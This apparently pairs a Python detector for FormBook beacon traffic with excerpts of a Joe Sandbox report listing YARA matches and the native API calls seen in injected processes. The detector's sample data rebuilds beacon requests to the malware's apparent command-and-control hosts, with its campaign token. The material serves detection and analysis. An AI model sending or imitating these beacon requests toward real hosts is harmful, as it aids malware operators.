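"""Added example (not from the Joe Sandbox report): parse raw HTTP requests and flag
the beacon shape seen in the Networking section: GET without a User-Agent, and one
query value repeated verbatim across many hosts."""
from collections import defaultdict
from typing import Dict, List, Tuple

QueryKey = Tuple[str, str]

# Four (host, query) pairs copied from the report's request lines; the last request
# below is constructed as a benign control. The 7-byte NUL body mirrors "Data Raw".
_REPORTED = [
    ("www.ussouthernhome.com",
     "Rh=Y2MlpveH8ZUh0bF&6l=ldw93ncdIRpnK2+SYFZ4XxcSdaL1EJRCuxI9ZUy/FVTDpSzjKcQcxAtGWqTUr4WUWqsB"),
    ("www.myreviewandbonuses.com",
     "6l=3sSzGDKqeoVzrX5Sn8ux2WAGTszDSWdOTpKicZCtYQqt6BLZU/lZy9O7FBLa6j9xXLzf&Rh=Y2MlpveH8ZUh0bF"),
    ("www.thrust-board.com",
     "Rh=Y2MlpveH8ZUh0bF&6l=jRDzq8l+sUykxws9W99RfZyinw9UtZsC3+WzPyJGQo9muB/nYvZVAbl6dW3bW8Aotu+H"),
    ("www.teelinkz.com",
     "6l=kNK7qyUr0rsKRGX6DQjm/XfEOCgL/rCBvSt6iCqDIwEC5hd1LlIznMkcIp/u79mXMRr7&Rh=Y2MlpveH8ZUh0bF"),
]
SAMPLE_REQUESTS: List[bytes] = [
    f"GET /o56q/?{q} HTTP/1.1\r\nHost: {h}\r\nConnection: close\r\n\r\n".encode() + b"\x00" * 7
    for h, q in _REPORTED
] + [b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
     b"User-Agent: Mozilla/5.0 (constructed)\r\nConnection: keep-alive\r\n\r\n"]


def parse_request(raw: bytes) -> Dict[str, object]:
    """Minimal HTTP/1.x request parser. Query pairs are kept verbatim (no %/+ decoding)
    so values can be compared across requests byte for byte."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    pairs = [tuple(p.split("=", 1)) if "=" in p else (p, "") for p in query.split("&") if p]
    return {"method": method, "path": path, "query": pairs, "headers": headers,
            "host": headers.get("host", ""), "body": body}


def request_flags(req: Dict[str, object]) -> List[str]:
    """Per-request signals; an empty list means nothing stood out."""
    flags = []
    if req["method"] in ("GET", "POST") and "user-agent" not in req["headers"]:
        flags.append("no User-Agent")
    if req["method"] == "GET" and req["body"]:
        flags.append("GET carries a body")
    return flags


def shared_query_values(reqs: List[Dict[str, object]], min_hosts: int = 3) -> Dict[QueryKey, List[str]]:
    """(key, value) pairs that recur verbatim across at least min_hosts distinct hosts:
    a fixed per-campaign token such as Rh=... survives the host rotation the report shows."""
    hosts: Dict[QueryKey, set] = defaultdict(set)
    for r in reqs:
        for key, value in r["query"]:
            hosts[(key, value)].add(r["host"])
    return {kv: sorted(h) for kv, h in hosts.items() if len(h) >= min_hosts}


def triage(raw_requests: List[bytes]) -> Dict[str, object]:
    """Flag individual requests and report cross-host shared query values."""
    reqs = [parse_request(r) for r in raw_requests]
    return {
        "flagged": {r["host"]: request_flags(r) for r in reqs if request_flags(r)},
        "shared": shared_query_values(reqs),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_REQUESTS).items():
        print(key, value)
```

On the constructed input the four report-derived requests are flagged (no User-Agent, body on a GET) and the control is not; the only query value shared by three or more hosts is `Rh=Y2MlpveH8ZUh0bF`, while every `6l` value is unique to its host. The cross-host check is the more durable of the two, since adding a User-Agent header is trivial for the sender but a token that must stay constant for the server is not.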

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match | the same 13 memory dumps and 6 unpacked PEs listed under AV Detection

          System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rules: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com); detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
          Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_00418180 NtCreateFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_00418230 NtReadFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_004182B0 NtClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_00418360 NtAllocateVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_0041822A NtReadFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_004182AA NtClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_0041835E NtAllocateVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059A00 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059A20 NtResumeThread, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_030599A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_030598F0 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_030597A0 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_030596E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_030595D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059B00 NtSetValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_0305A3B0 NtGetContextThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059A10 NtQuerySection
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059A80 NtOpenDirectoryObject
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059950 NtQueueApcThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_030599D0 NtCreateProcessEx
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059820 NtEnumerateKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_0305B040 NtSuspendThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_030598A0 NtWriteVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_0305A710 NtOpenProcessToken
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059730 NtQueryVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059760 NtOpenProcess
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059770 NtSetInformationFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_0305A770 NtOpenThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059610 NtEnumerateValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059650 NtQueryValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059670 NtQueryInformationProcess
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_030596D0 NtCreateKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059520 NtWaitForSingleObject
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_0305AD30 NtSetContextThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_03059560 NtWriteFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_030595F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\NQQWym075C.exe; Code function: 4_2_05FD00AD NtOpenSection, NtMapViewOfSection
          Source: C:\Users\user\Desktop\NQQWym075C.exe; Code function: 4_2_05FD1C09 CreateProcessW, NtQueryInformationProcess, NtReadVirtualMemory, NtCreateSection, NtMapViewOfSection, NtMapViewOfSection, NtWriteVirtualMemory, NtGetContextThread, NtSetContextThread, NtResumeThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_00418180 NtCreateFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_00418230 NtReadFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_004182B0 NtClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_00418360 NtAllocateVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_0041822A NtReadFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_004182AA NtClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_0041835E NtAllocateVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39A20 NtResumeThread, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39A00 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F398F0 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F399A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F396E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F397A0 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F395D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39A80 NtOpenDirectoryObject
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39A10 NtQuerySection
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F3A3B0 NtGetContextThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39B00 NtSetValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F398A0 NtWriteVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F3B040 NtSuspendThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39820 NtEnumerateKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F399D0 NtCreateProcessEx
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39950 NtQueueApcThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F396D0 NtCreateKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39670 NtQueryInformationProcess
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39650 NtQueryValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39610 NtEnumerateValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39770 NtSetInformationFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F3A770 NtOpenThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39760 NtOpenProcess
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39730 NtQueryVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F3A710 NtOpenProcessToken
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F395F0 NtQueryInformationFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39560 NtWriteFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F3AD30 NtSetContextThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_02F39520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_037599A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759650 NtQueryValueKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_037596E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_037596D0 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_037595D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_0375A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759A20 NtResumeThread
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759A10 NtQuerySection
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_037599D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_0375B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_037598F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_037598A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_0375A770 NtOpenThread
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759760 NtOpenProcess
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_0375A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_037597A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759560 NtWriteFile
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_0375AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03759520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_037595F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03258360 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03258230 NtReadFile
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_032582B0 NtClose
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_03258180 NtCreateFile
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_0325835E NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_0325822A NtReadFile
          Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 6_2_032582AA NtClose
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D95D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D96E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9560 NtWriteFile
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9540 NtReadFile
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047DAD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D95F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9650 NtQueryValueKey
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D96D0 NtCreateKey
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047DA770 NtOpenThread
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9760 NtOpenProcess
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047DA710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9710 NtQueryInformationToken
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D97A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9780 NtMapViewOfSection
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047DB040 NtSuspendThread
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9840 NtDelayExecution
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D98F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D98A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D99D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D99A0 NtCreateSection
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9A50 NtCreateFile
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9A20 NtResumeThread
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 10_2_047D9A10 NtQuerySection
